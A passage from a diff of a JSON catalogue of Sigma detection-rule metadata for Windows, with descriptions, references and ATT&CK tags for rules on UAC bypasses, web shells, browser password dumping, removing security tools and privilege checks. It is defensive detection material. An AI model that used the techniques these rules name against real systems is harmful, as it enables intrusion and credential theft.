], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", - "value": "UAC Bypass Using NTFS Reparse Point - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "value": "UAC Bypass Using PkgMgr and DISM", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass 
using a path parsing issue in winsat.exe (UACMe 52)", - "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "value": "UAC Bypass Abusing Winsat Path Parsing - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_winsat.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "value": "UAC Bypass Using Windows Media Player - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_wmp.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). 
Adversaries use this technique to execute privileged processes.", - "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", - "value": "Bypass UAC via WSReset.exe", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://www.activecyber.us/activelabs/windows-uac-bypass", - "https://twitter.com/ReaQta/status/1222548288731217921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_uac_bypass_wsreset.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown sub processes of Wsreset.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "value": "UAC Bypass WSReset", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://github.com/hfiref0x/UACME", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - 
"description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", - "value": "Use of UltraViewer Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/09/25", - "filename": "proc_creation_win_ultraviewer.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", - "value": "Use of UltraVNC Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/10/02", - "filename": "proc_creation_win_ultravnc.yml", - "author": 
"frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "value": "Uninstall Crowdstrike Falcon", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/12", - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Uninstall by admin" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", - "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "value": "Uninstall Sysinternals Sysmon", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/01/12", - "filename": "proc_creation_win_uninstall_sysmon.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an unexpected process 
spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "value": "Unusual Child Porcess of dns.exe", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious parent process for cmd.exe", - "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "value": "Unusual Parent Process for cmd.exe", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/09/21", - "filename": "proc_creation_win_unusual_parent_for_cmd.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", - "value": "User Discovery And Export Via Get-ADUser Cmdlet", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - 
"https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_user_discovery_get_aduser.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "value": "Possible Privilege Escalation via Weak Service Permissions", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://pentestlab.blog/2017/03/30/weak-service-permissions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", - "author": "Teymur Kheirkhabarov", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "value": "Abuse of Service Permissions to Hide Services in 
Tools", - "meta": { - "refs": [ - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Rare intended use of hidden services" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", - "value": "Abuse of Service Permissions to Hide Services Via Set-Service", - "meta": { - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_win_using_set_service_to_hide_services.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare intended use of hidden services" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", - "value": "Verclsid.exe Runs COM Object", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", - "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_verclsid_runs_com.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence 
setup", - "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", - "value": "VMToolsd Suspicious Child Process", - "meta": { - "refs": [ - "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" - ], - "creation_date": "2021/10/08", - "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", - "author": "behops, Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Legitimate use by administrator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", - "value": "Java Running with Remote Debugging", - "meta": { - "refs": [ - "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" - ], - "tags": [ - "attack.t1203", - "attack.execution" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_vul_java_remote_debugging.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", - "value": "Use of W32tm as Timer", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", - "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1124" - ], - "creation_date": "2022/09/25", - "filename": "proc_creation_win_w32tm.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", - "value": "Wab Execution From Non Default Location", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/08/12", - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", - "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", - "value": "Wab/Wabmig Unusual Parent Or Child Processes", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution"
- ],
- "creation_date": "2022/08/12",
- "filename": "proc_creation_win_wab_unusual_parents.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline",
- "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4",
- "value": "Weak or Abused Passwords In CLI",
- "meta": {
- "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
- "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution"
- ],
- "creation_date": "2022/09/14",
- "filename": "proc_creation_win_weak_or_abused_passwords.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate usage of the passwords by users via commandline (should be discouraged)",
- "Other currently unknown false positives"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect use of WebBrowserPassView.exe",
- "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513",
- "value": "Launch WebBrowserPassView Executable",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1555.003"
- ],
- "creation_date": "2022/08/20",
- "filename": "proc_creation_win_webbrowserpassview.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate use"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells",
- "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb",
- "value": "Chopper Webshell Process Pattern",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003",
- "attack.t1018",
- "attack.t1033",
- "attack.t1087"
- ],
- "creation_date": "2022/10/01",
- "filename": "proc_creation_win_webshell_chopper.yml",
- "author": "Florian Roth (rule), MSTI (query)",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects certain command line parameters often used during reconnaissance activity via web shells",
- "uuid": "bed2a484-9348-4143-8a8a-b801c979301c",
- "value": "Webshell Detection With Command Line Keywords",
- "meta": {
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html",
- "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003",
- "attack.t1018",
- "attack.t1033",
- "attack.t1087"
- ],
- "creation_date": "2017/01/01",
- "filename": "proc_creation_win_webshell_detection.yml",
- "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system",
- "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9",
- "value": "Webshell Hacking Activity Patterns",
- "meta": {
- "refs": [
- "https://youtu.be/7aemGhaE9ds?t=641",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003",
- "attack.t1018",
- "attack.t1033",
- "attack.t1087"
- ],
- "creation_date": "2022/03/17",
- "filename": "proc_creation_win_webshell_hacking.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands",
- "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677",
- "value": "Webshell Recon Detection Via CommandLine & Processes",
- "meta": {
- "refs": [
- "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003"
- ],
- "creation_date": "2020/07/22",
- "filename": "proc_creation_win_webshell_recon_detection.yml",
- "author": "Cian Heasley, Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack",
- "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600",
- "value": "Shells Spawned by Web Servers",
- "meta": {
- "refs": [
- "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003",
- "attack.t1190"
- ],
- "creation_date": "2019/01/16",
- "filename": "proc_creation_win_webshell_spawn.yml",
- "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)",
- "level": "high",
- "falsepositive": [
- "Particular web applications may spawn a shell process legitimately"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)",
- "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d",
- "value": "Usage Of Web Request Commands And Cmdlets",
- "meta": {
- "refs": [
- "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/",
- "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2019/10/24",
- "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml",
- "author": "James Pemberton / @4A616D6573",
- "level": "medium",
- "falsepositive": [
- "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer."
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of the wevtutil utility to perform reconnaissance",
- "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf",
- "value": "Wevtutil Recon",
- "meta": {
- "refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml"
- ],
- "tags": [
- "attack.discovery"
- ],
- "creation_date": "2022/09/09",
- "filename": "proc_creation_win_wevtutil_recon.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitmate usage of the utility by administrators to query the event log"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors",
- "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db",
- "value": "Run Whoami as Privileged User",
- "meta": {
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
- "https://nsudo.m2team.org/en-us/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.discovery",
- "attack.t1033"
- ],
- "creation_date": "2022/01/28",
- "filename": "proc_creation_win_whoami_as_priv_user.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.",
- "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1",
- "value": "Run Whoami as SYSTEM",
- "meta": {
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.discovery",
- "attack.t1033"
- ],
- "creation_date": "2019/10/23",
- "filename": "proc_creation_win_whoami_as_system.yml",
- "author": "Teymur Kheirkhabarov, Florian Roth",
- "level": "high",
- "falsepositive": [
- "Possible name overlap with NT AUHTORITY substring to cover all languages"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. This is often used after a privilege escalation attempt.",
- "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b",
- "value": "Run Whoami Showing Privileges",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.discovery",
- "attack.t1033"
- ],
- "creation_date": "2021/05/05",
- "filename": "proc_creation_win_whoami_priv.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Administrative activity (rare lookups on current privileges)"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Task Scheduler .job import arbitrary DACL write\\par",
- "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf",
- "value": "Windows 10 Scheduled Task SandboxEscaper 0-day",
- "meta": {
- "refs": [
- "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1053.005",
- "car.2013-08-001"
- ],
- "creation_date": "2019/05/22",
- "filename": "proc_creation_win_win10_sched_task_0day.yml",
- "author": "Olaf Hartong",
- "level": "high",
